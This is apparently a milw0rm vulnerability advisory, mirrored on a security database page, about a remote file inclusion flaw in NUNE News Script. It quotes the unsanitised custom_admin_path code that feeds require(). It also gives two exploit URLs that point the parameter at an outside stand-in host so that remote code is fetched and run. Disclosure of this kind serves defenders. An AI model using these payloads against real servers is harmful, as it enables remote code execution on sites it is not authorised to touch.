Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15636
HistoryJan 09, 2007 - 12:00 a.m.

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

2007-01-0900:00:00
vulners.com
36

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity


Author: xoron


Code:

if (isset($custom_admin_path))
$special_admin_path = $custom_admin_path;

else
$special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");


3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?


download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz


Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum…!


milw0rm.com [2007-01-06]